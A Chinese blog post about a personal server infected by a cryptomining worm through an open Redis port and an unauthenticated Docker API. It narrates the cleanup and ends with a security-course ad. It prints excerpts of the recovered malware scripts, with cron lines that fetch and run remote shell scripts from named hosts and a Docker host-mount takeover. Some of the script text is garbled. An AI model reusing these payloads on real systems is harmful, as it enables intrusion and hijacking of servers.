今天在打开服务器准备进入docker中的mysql测试sqlmode时,突然发现进不去mysql,然后我一看,mysql挂了,不止mysql,其他应用也全挂了。
![](https://img-home.csdnimg.cn/images/20230724024159.png?origin_url=https%3A%2F%2Fp9-juejin.byteimg.com%2Ftos-cn-i-k3u1fbpfcp%2F02da1d68b2eb412895a9597e1bce087d~tplv-k3u1fbpfcp-zoom-in-crop-mark%3A4536%3A0%3A0%3A0.image%3F%29%20%E7%84%B6%E5%90%8E%E6%88%91%E5%B0%9D%E8%AF%95%E9%87%8D%E5%90%AF%EF%BC%8C%E5%90%AF%E5%8A%A8%E4%B8%8D%E4%BA%86%E3%80%82%E6%88%91%E6%89%93%E5%BC%80%E7%9B%91%E6%8E%A7%E5%92%8C%E4%BD%BF%E7%94%A8top%E5%91%BD%E4%BB%A4%E6%9F%A5%E7%9C%8B%E8%BF%9B%E7%A8%8B%E4%BF%A1%E6%81%AF%EF%BC%8C%E5%8F%91%E7%8E%B0cpu%E5%B1%85%E7%84%B6%E5%8D%A0%E7%94%A8100%25%EF%BC%8C%E5%B0%B1%E6%9C%89%E4%BA%86%E4%B8%8B%E9%9D%A2%E7%9A%84%E5%86%85%E5%AE%B9&pos_id=img-brCX5tnW-1705580711877%29)
![](https://img-blog.csdnimg.cn/img_convert/51d6f69f66dbca7a620f824718a73c79.png)
我一看,cpu100%,网上查找:kswapd0
占用过高是因为 物理内存不足,使用swap分区与内存换页操作交换数据,导致CPU占用过高。(后来我才领悟,原来这根本不是kswapd0
,而是木马程序伪装的[kswapd0]
,专门骗我这种小白)
![](https://img-blog.csdnimg.cn/img_convert/c8bb00e886e18bb095834a9e4f929c79.png)
可以看到2394这个进程占用cpu最多,于是我看了很久没查出什么问题,于是直接kill 2349
cpu降下来了。。。
可是我又发现还有一个进程9951 pnscan占用比较高,老规矩,打开百度搜一搜
![](https://img-blog.csdnimg.cn/img_convert/c385ab668e4d60a96c60286933a3911c.png)
好家伙,还没输完,百度就已经提示我pnscan木马了 于是我意识到服务器被病毒入侵了,立马去找杀毒方案 通过网络搜索,我大概知道是从redis入侵的了 查看刚刚的pnscan进程信息:
![](https://img-blog.csdnimg.cn/img_convert/00e7b2871fa3f85c892357b64372add9.png)
看到了熟悉的6379 ,确认从redis入侵无疑了,想起我的redis只是测试使用,所以没有设置密码。
发现pnscan相关进程,全部kill,然后根据上图中的路径删除/usr/local/bin目录下的pnscan脚本
rm -rfpnscan
当我删完,我以为就应该没事了,结果cpu还是占用很高
![](https://img-blog.csdnimg.cn/img_convert/f615424243f5c276e9f1262bb303fb8f.png)
找了很多方法,还是无法解决
于是我无意间使用 netstat -ant
命令查看了一下网络连接状态
不查不知道,一查吓一跳
![](https://img-blog.csdnimg.cn/img_convert/d868bedca7017fcf424abf6d4346e63a.png)
2375 ,好熟悉的端口,这不是我前天为了远程连接docker部署项目打开的吗。
一时间我悟了,原来病毒不止一个。
知己知彼百战不殆,于是我就去找到了这篇博文Docker暴露2375端口导致服务器被攻击解决方法!
只需要通过以下命令就可以操作你的docker
docker -H tcp://服务器ip:2375 docker命令
docker官网:
Warning: Changing the default docker daemon binding to a TCP port or Unix docker user group will increase your security risks by allowing non-root users to gain root access on the host. Make sure you control access to docker. If you are binding to a TCP port, anyone with access to that port has full Docker access; so it is not advisable on an open network.
告知了可能会被入侵。
解决办法:目前我先关掉了2375端口远程连接
我是通过修改vim /lib/systemd/system/docker.service
下图是我添加的,把它删掉
![](https://img-blog.csdnimg.cn/img_convert/f56591264e40cf30a2fa402d4d3ea9cb.png)
然后执行
systemctl daemon-reload
```接着继续看\[scan\]进程
ps -ef |grep scan
进入/usr/share
目录,发现两个可疑的程序,为啥要这么明显?
![](https://img-blog.csdnimg.cn/img_convert/e2255ede7135373429bc1cc41ed56365.png)
好奇心让我想看看这shell里面写的啥
[scan] 截取部分
#!/bin/bash
setenforce 0 2>/dev/null
ulimit -u 50000
sleep 1
iptables -I INPUT 1 -p tcp --dport 6379 -j DROP 2>/dev/null
iptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPT 2>/dev/null
function SecureTheSystem(){
SYSFILEARRAY=(pstree kill pkill htop netstat ss lsofwget wge wdl curl cur cdl sysctl )
for SYSFILE in ${SYSFILEARRAY[@]}; do
SYSFILEBIN=which $SYSFILE
2>/dev/null 1>/dev/null
tntrecht -i $SYSFILEBIN 2>/dev/null 1>/dev/null
chattr -i $SYSFILEBIN 2>/dev/null 1>/dev/null
chmod -x $SYSFILEBIN 2>/dev/null 1>/dev/null
chattr +i $SYSFILEBIN 2>/dev/null 1>/dev/null
tntrecht +i $SYSFILEBIN 2>/dev/null 1>/dev/null
done
SYSTEMFILEARRAY=(“/root/.ssh/” “/home//.ssh/" “/etc/passwd” “/etc/shadow” “/etc/sudoers” “/etc/ssh/” “/etc/ssh/sshd_config”)
for SYSTEMFILE in ${SYSTEMFILEARRAY[@]}; do
tntrecht +i -R $SYSTEMFILE2>/dev/null 1>/dev/null
chattr +i -R $SYSTEMFILE2>/dev/null 1>/dev/null
done
}
sleep 1if [ -f “/bin/ps.original” ]thenps.original -fe|grep pnscan |grep -v grepelseps -fe|grep pnscan |grep -v grepfi
if [ $? -ne 0 ]
thenrm -rf .dat .shard .ranges .lan 2>/dev/nullsleep 1echo ‘config set dbfilename “backup.db”’ > .datecho ‘save’ >> .datecho ‘config set stop-writes-on-bgsave-error no’ >> .datecho ‘flushall’ >> .datecho 'set backup1 "\n\n\n/2 * * * * cd1 -fsSL http://oracle.zzhreceive.top/b2f628/b.sh | sh\n\n”’ >> .datecho ‘set backup2 “\n\n\n*/3 * * * * wget -q -O- http://oracle.zzhreceive.top/b2f628/b.sh | sh\n\n”’ >> .datecho ‘set backup3 “\n\n\n*/4 * * * * curl -fsSL http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh\n\n”’ >> .datecho ‘set backup4 “\n\n\n*/5 * * * * wd1 -q -O- http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh\n\n”’ >> .datecho ‘config set dir “/var/spool/cron/”’ >> .datecho ‘config set dbfilename “root”’ >> .datecho ‘save’ >> .datecho ‘config set dir “/var/spool/cron/crontabs”’ >> .datecho ‘save’ >> .datecho ‘flushall’ >> .datecho ‘set backup1 “\n\n\n*/2 * * * * root cd1 -fsSL http://oracle.zzhreceive.top/b2f628/b.sh | sh\n\n”’ >> .datecho ‘set backup2 “\n\n\n*/3 * * * * root wget -q -O- http://oracle.zzhreceive.top/b2f628/b.sh | sh\n\n”’ >> .datecho ‘set backup3 “\n\n\n*/4 * * * * root curl -fsSL http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh\n\n”’ >> .datecho ‘set backup4 “\n\n\n*/5 * * * * root wd1 -q -O- http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh\n\n”’ >> .datecho ‘config set dir “/etc/cron.d/”’ >> .datecho ‘config set dbfilename “zzh”’ >> .datecho ‘save’ >> .datecho ‘config set dir “/etc/”’ >> .datecho ‘config set dbfilename “crontab”’ >> .datecho ‘save’ >> .datsleep 1pnx=pnscan[ -x /usr/local/bin/pnscan ] && pnx=/usr/local/bin/pnscan[ -x /usr/bin/pnscan ] && pnx=/usr/bin/pnscanwhile true; do
\[mass\] 截取部分
#!/bin/bash
if [ -f /bin/cd1 ];then
aabb=/bin/cd1
echo “cd1 exist”
elif [ -f /bin/curl ];then
aabb=/bin/curl
echo “curl exist”
else
echo “curl not exist,use yum reinstall”
yum -y remove curl&&yum -y install curl
fi
chmod +x /usr/bin/zgrab
dAPIpwn(){
range=$1
port=$2
rate=
3
r
n
d
s
t
r
=
3 rndstr=
3rndstr=(head /dev/urandom | tr -dc a-z | head -c 6 ; echo ‘’)
eval “
r
n
d
s
t
r
"
=
"
′
rndstr"="'
rndstr"="′(masscan
r
a
n
g
e
−
p
range -p
range−pport --rate=$rate | awk ‘{print $6}’| zgrab --senders 200 --port $port --http=‘/v1.16/version’ --output-file=- 2>/dev/null | grep -E ‘ApiVersion|client version 1.16’ | jq -r .ip)'”;
for ipaddy in ${!rndstr}
do
TARGET= i p a d d y : ipaddy: ipaddy:port
echo ‘##################################################’
a
a
b
b
−
s
L
k
h
t
t
p
:
/
/
107..3.150
/
i
n
p
u
t
/
d
a
.
p
h
p
?
v
u
l
n
=
aabb -sLk http://107..3.150/input/da.php?vuln=
aabb−sLkhttp://107..3.150/input/da.php?vuln=TARGET -o /dev/null
echo $TARGET
timeout -s SIGKILL 240 docker -H $TARGET run --rm -v /:/mnt alpine chroot /mnt/ /bin/sh -c "if /etc/crontab && echo “* * * * * root curl https://img-home.csdnimg.cn/images/20230724024159.png?origin_url=http%3A%2F%2F107.189.3.150%2Fb2f628%2Fcronb.sh%7Cbash%5C&pos_id=img-V2ZXevkL-1705580715224)”>/etc/cron.d/zzh
done
}
额,看不太懂,可以看到的是对我的redis 6379和2375,2376端口都进行了入侵
既然已经备份下来了(后期再分析分析,知己知彼百战不殆嘛),那么就无情rm -rf 了
然后我top
发现有一个进程masscan,无论我怎样kill还是会重启
于是我查看定时任务cd /var/spool/cron/
,找到了原因
话不多说,记录下来之后rm -rf root
好家伙,还是又重启了
![](https://img-blog.csdnimg.cn/img_convert/c404530b93e2406f77eb5808904575ec.png)
经过一段时间查询,搜索,我发现病毒进程不止masscan
利用Docker remote api未授权访问漏洞攻击,再利用ssh攻击传播,再安装IRC后门,文章提到的利用masscan,zgrab对外扫描占用宽带在上图中可以体现。
![](https://img-home.csdnimg.cn/images/20230724024159.png?origin_url=https%3A%2F%2Fp9-juejin.byteimg.com%2Ftos-cn-i-k3u1fbpfcp%2F84099de03c9443d787d3a44ba9360d7f~tplv-k3u1fbpfcp-zoom-in-crop-mark%3A4536%3A0%3A0%3A0.image%3F%29%E6%8E%A5%E4%B8%8B%E6%9D%A5%E5%8D%B8%E8%BD%BDmassage%20%2Czgrab%2C%E4%BD%86%E6%98%AF%E5%BD%93%E6%88%91%E6%83%B3%E8%A6%81%E5%8D%B8%E8%BD%BD%E6%97%B6%EF%BC%8C%E5%8F%91%E7%8E%B0yum%E4%B9%9F%E8%A2%AB%E7%A0%B4%E5%9D%8F&pos_id=img-enq4qybm-1705580716124%29)
![](https://img-blog.csdnimg.cn/img_convert/f1fb54893dde12558040773a13d1eeab.png)
当我尝试修改yum的内容时,告诉我文件只读,然后我修改权限,发现没法修改权限
![](https://img-blog.csdnimg.cn/img_convert/87f2374fa7bc183bb56011867738ed65.png)
执行ls -l yum
—xr-xr-x. 1 root root 801 11月5 2018 yum
一番百度后:chattr -i yum
,再修改yum文件权限,好使了
修改一下yum解释器
我使用find命令查找masscan find -name masscan
,发现bin目录下的可执行文件,直接删除
![](https://img-blog.csdnimg.cn/img_convert/eee45faad75e1fce6d7b0fd737eee9d8.png)
好家伙,我要哭了,[mass]又出现了,此刻我又发现了一个比较可疑的进程systemd-journal
,搜索一下,好家伙,和systemd-journald
就差一个字母,这玩意儿绝对是木马进程。
![](https://img-blog.csdnimg.cn/img_convert/c18a95be1b269b43406132b6330aa34f.png)
捣鼓了一段时间,还是无法彻底解决。然后我kill
掉这个进程,没了,接下来我就观察一下进程的变化,观察了很久都没有出现[mass],但docker容器已经被破坏了。
最后我重置了服务器,更换了Debian系统。
好像是没木马了一样,但是我的环境已经被破坏了,太难受了,系统安全真的很重要,我偶尔会听到朋友(这个朋友就是我)说数据库被黑,被勒索,系统被挖矿,其实这些都是可以避免的,在往后的学习工作中一定会更加注重系统安全,后续也会就该漏洞和病毒进一步学习研究,学习规避方案。
本次服务器被入侵的原因主要是因为redis没有设置密码和docker开启remote api之后没有进行相关验证,不法分子利用程序漏洞进行了攻击,虽然只是学习环境,但以后还是要加强一下安全方面的处理。
附上阿里云漏洞库链接:Docker daemon API 未授权访问漏洞
不过换个角度,我觉得自己又学到了很多知识,增长了经验,再重新搭一遍环境也正好可以巩固一下知识,欢迎大家评论留下宝贵的经验建议。
网络安全成长路线图
这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不过,要想从脚本小子变成hei客大神,这个方向越往后,需要学习和掌握的东西就会越来越多,以下是学习网络安全需要走的方向:
# 网络安全学习方法
上面介绍了技术分类和学习路线,这里来谈一下学习方法:
## 视频学习
习网络安全需要走的方向:
# 网络安全学习方法
上面介绍了技术分类和学习路线,这里来谈一下学习方法:
## 视频学习
无论你是去B站或者是油管上面都有很多网络安全的相关视频可以学习,当然如果你还不知道选择那套学习,我这里也整理了一套和上述成长路线图挂钩的视频教程,完整版的视频已经上传至CSDN官方,朋友们如果需要可以点击这个链接免费领取。网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!